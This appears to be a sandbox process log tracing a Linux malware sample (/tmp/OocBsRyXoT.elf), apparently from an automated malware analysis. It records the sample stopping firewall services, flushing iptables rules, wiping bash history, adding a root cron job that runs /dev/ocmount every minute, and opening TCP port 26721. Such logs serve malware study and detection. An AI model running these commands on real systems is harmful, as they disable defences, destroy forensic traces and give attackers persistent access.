                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/systemctl
                                                                  Arguments:systemctl --quiet is-active multi-user.target
                                                                  File size:996584 bytes
                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/systemctl
                                                                  Arguments:systemctl list-unit-files --full --type=socket
                                                                  File size:996584 bytes
                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:11
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/sed
                                                                  Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                  File size:121288 bytes
                                                                  MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                  Start time (UTC):23:15:15
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/systemctl
                                                                  Arguments:systemctl stop iptables.service
                                                                  File size:996584 bytes
                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                  Start time (UTC):23:15:15
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:15
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "/sbin/iptables -F; /sbin/iptables -X"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:15
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:15
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/sbin/iptables
                                                                  Arguments:/sbin/iptables -F
                                                                  File size:99296 bytes
                                                                  MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                  Start time (UTC):23:15:15
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:15
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/sbin/iptables
                                                                  Arguments:/sbin/iptables -X
                                                                  File size:99296 bytes
                                                                  MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                  Start time (UTC):23:15:15
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:15
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "service firewall stop"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:15
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:15
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:service firewall stop
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:16
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:16
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/basename
                                                                  Arguments:basename /usr/sbin/service
                                                                  File size:39256 bytes
                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                  Start time (UTC):23:15:16
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:16
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/basename
                                                                  Arguments:basename /usr/sbin/service
                                                                  File size:39256 bytes
                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                  Start time (UTC):23:15:16
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:16
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/systemctl
                                                                  Arguments:systemctl --quiet is-active multi-user.target
                                                                  File size:996584 bytes
                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                  Start time (UTC):23:15:16
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:16
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:16
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/systemctl
                                                                  Arguments:systemctl list-unit-files --full --type=socket
                                                                  File size:996584 bytes
                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                  Start time (UTC):23:15:16
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/service
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:16
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/sed
                                                                  Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                  File size:121288 bytes
                                                                  MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/systemctl
                                                                  Arguments:systemctl stop firewall.service
                                                                  File size:996584 bytes
                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "history -c"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "rm -rf ~/.bash_history"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm -rf /root/.bash_history
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "history -w"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:18
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "chmod +x /dev/ocmount"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x /dev/ocmount
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c /dev/ocmount
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/iptables
                                                                  Arguments:iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                  File size:99296 bytes
                                                                  MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/busybox
                                                                  Arguments:/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                  File size:2172376 bytes
                                                                  MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:30
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:30
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/busybox
                                                                  Arguments:busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                  File size:2172376 bytes
                                                                  MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:27
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:27
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:27
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:27
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:27
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/iptables
                                                                  Arguments:iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                  File size:99296 bytes
                                                                  MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/busybox
                                                                  Arguments:/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                  File size:2172376 bytes
                                                                  MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:28
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/busybox
                                                                  Arguments:busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                  File size:2172376 bytes
                                                                  MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                  Start time (UTC):23:15:27
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:27
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:27
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/tmp/OocBsRyXoT.elf
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/systemd/systemd
                                                                  Arguments:-
                                                                  File size:1620224 bytes
                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/upower/upowerd
                                                                  Arguments:/usr/lib/upower/upowerd
                                                                  File size:260328 bytes
                                                                  MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gnome-session-binary
                                                                  Arguments:-
                                                                  File size:334664 bytes
                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-wacom
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gsd-wacom
                                                                  Arguments:/usr/libexec/gsd-wacom
                                                                  File size:39520 bytes
                                                                  MD5 hash:13778dd1a23a4e94ddc17ac9caa4fcc1

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gnome-session-binary
                                                                  Arguments:-
                                                                  File size:334664 bytes
                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gsd-keyboard
                                                                  Arguments:/usr/libexec/gsd-keyboard
                                                                  File size:39760 bytes
                                                                  MD5 hash:8e288fd17c80bb0a1148b964b2ac2279
                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gnome-session-binary
                                                                  Arguments:-
                                                                  File size:334664 bytes
                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                  Start time (UTC):23:15:19
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gsd-rfkill
                                                                  Arguments:/usr/libexec/gsd-rfkill
                                                                  File size:51808 bytes
                                                                  MD5 hash:88a16a3c0aba1759358c06215ecfb5cc

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/systemd/systemd
                                                                  Arguments:-
                                                                  File size:1620224 bytes
                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/upower/upowerd
                                                                  Arguments:/usr/lib/upower/upowerd
                                                                  File size:260328 bytes
                                                                  MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gnome-session-binary
                                                                  Arguments:-
                                                                  File size:334664 bytes
                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gsd-smartcard
                                                                  Arguments:/usr/libexec/gsd-smartcard
                                                                  File size:109152 bytes
                                                                  MD5 hash:ea1fbd7f62e4cd0331eae2ef754ee605
                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/xfce4-panel
                                                                  Arguments:-
                                                                  File size:375768 bytes
                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
